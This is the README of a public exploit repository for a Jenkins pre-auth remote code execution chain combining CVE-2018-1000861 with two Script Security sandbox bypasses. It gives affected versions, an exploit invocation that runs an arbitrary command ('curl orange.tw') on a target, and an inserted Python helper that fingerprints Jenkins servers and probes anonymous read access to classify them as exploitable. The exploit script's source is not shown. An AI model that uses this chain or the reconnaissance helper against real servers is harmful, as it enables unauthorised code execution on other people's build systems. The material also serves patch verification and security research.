awesome-jenkins-rce-2019

Repository snapshot: branch master, latest commit b07e9c0 (May 17, 2019).

There has been no pre-auth RCE in Jenkins since May 2017, but this is the one!

It chains CVE-2018-1000861 (the Stapler dynamic-routing ACL bypass) with two Script Security Plugin sandbox bypasses, CVE-2019-1003005 and CVE-2019-1003029, into a more reliable and elegant pre-auth remote code execution! The ACL bypass is what removes the authentication requirement; the sandbox bypasses need only Overall/Read, which is why the affected range depends on whether anonymous read is enabled.

Affected versions

  • ANONYMOUS_READ disabled

    • Jenkins version < 2.138
  • ANONYMOUS_READ enabled (or with a normal user account)

    • Jenkins build time < 2019-01-28

Usage

First confirm the target is Jenkins and read its version from the `X-Jenkins` header, then point `exp.py` at it with the command to run:

```shell
$ curl -s -I http://jenkins/ | grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000

$ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)
```
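A triage helper that applies the affected list above to the headers shown in the usage section, so a target can be classified before anything is thrown at it. This is an added example and not the repository's `exp.py`; the function names, the sample response, and the anonymous-read probe (an unauthenticated `GET /api/json`, which Jenkins answers with 200 only when the anonymous user holds Overall/Read and with 403 otherwise) are my assumptions, as is the way the build date is supplied, since the headers do not carry it.

```python
"""Version/ACL triage for the affected list above (added example, not the repository's exp.py)."""
from datetime import date
import urllib.error
import urllib.request

# Constructed from the curl -I output shown in the README; the status line and the
# two non-Jenkins headers are assumed for illustration.
SAMPLE_HEAD_RESPONSE = """HTTP/1.1 403 Forbidden
X-Content-Type-Options: nosniff
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000
Content-Type: text/html;charset=utf-8
"""

ACL_BYPASS_CUTOFF = (2, 138)        # README: ANONYMOUS_READ disabled -> core < 2.138
SANDBOX_CUTOFF = date(2019, 1, 28)  # README: ANONYMOUS_READ enabled  -> build time < 2019-01-28


def parse_head_response(raw):
    """Turn a raw HEAD response into {lowercased header name: value}; the status line is skipped."""
    headers = {}
    for line in raw.splitlines():
        if line.startswith("HTTP/") or ":" not in line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def version_tuple(version):
    """'2.137' -> (2, 137); '2.121.3' -> (2, 121, 3).  Parsing stops at the first non-numeric piece."""
    parts = []
    for piece in version.split("."):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    return tuple(parts)


def assess(version, anonymous_read, build_date=None):
    """Apply the README's two conditions and return a one-line verdict.

    Without Overall/Read the chain needs the ACL bypass, which the README ties to core < 2.138.
    With Overall/Read (anonymous or a normal account) only the sandbox bypasses are needed and the
    README keys that on build time, passed here as an ISO date string (operator-supplied assumption).
    """
    if not anonymous_read:
        if version_tuple(version) < ACL_BYPASS_CUTOFF:
            return "affected: pre-auth via CVE-2018-1000861 chain"
        return "not affected: ACL bypass closed and no Overall/Read"
    if build_date is None:
        return "undetermined: Overall/Read available, supply the build date"
    if date.fromisoformat(build_date) < SANDBOX_CUTOFF:
        return "affected: sandbox bypass with Overall/Read"
    return "not affected: sandbox bypass closed"


def triage(raw_head_response, anonymous_read, build_date=None):
    """Combine header parsing and the version test into one report dict."""
    headers = parse_head_response(raw_head_response)
    version = headers.get("x-jenkins")
    if version is None:
        return {"jenkins": False, "verdict": "no X-Jenkins header: not Jenkins, or a proxy strips it"}
    return {
        "jenkins": True,
        "version": version,
        "cli_port": headers.get("x-jenkins-cli-port"),
        "verdict": assess(version, anonymous_read, build_date),
    }


def probe(base_url, timeout=10):
    """Live version of the two checks (assumed probing method, not described by the README).

    HEAD / carries X-Jenkins even on a 403, so the headers are read from the error as well;
    GET /api/json is 200 only when the anonymous user has Overall/Read.
    """
    base_url = base_url.rstrip("/")
    try:
        with urllib.request.urlopen(urllib.request.Request(base_url, method="HEAD"), timeout=timeout) as resp:
            headers = resp.headers
    except urllib.error.HTTPError as err:
        headers = err.headers
    raw = "HTTP/1.1 000 probe\n" + "".join(f"{k}: {v}\n" for k, v in headers.items())
    try:
        with urllib.request.urlopen(base_url + "/api/json", timeout=timeout) as resp:
            anonymous_read = resp.status == 200
    except urllib.error.HTTPError:
        anonymous_read = False
    return triage(raw, anonymous_read)


if __name__ == "__main__":
    print(triage(SAMPLE_HEAD_RESPONSE, anonymous_read=False))
```

The numeric comparison is a heuristic: LTS lines (2.x.y) sort below the weekly 2.138 cut whatever fixes they carry, and the build date has to come from the release changelog, so treat the verdict as a prompt to confirm against the Jenkins advisories for that line rather than as proof.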

Tested on

  • Jenkins 2.53
  • Jenkins 2.122
  • Jenkins 2.137
  • Jenkins 2.138 with ANONYMOUS_READ enabled
  • Jenkins 2.152 with ANONYMOUS_READ enabled
  • Jenkins 2.153 with ANONYMOUS_READ enabled
  • Script Security Plugin 1.43
  • Script Security Plugin 1.48

Acknowledgements

Selected slides from my HITB AMS 2019 talk:

[slide images: 1.png, 2.png, 3.png]
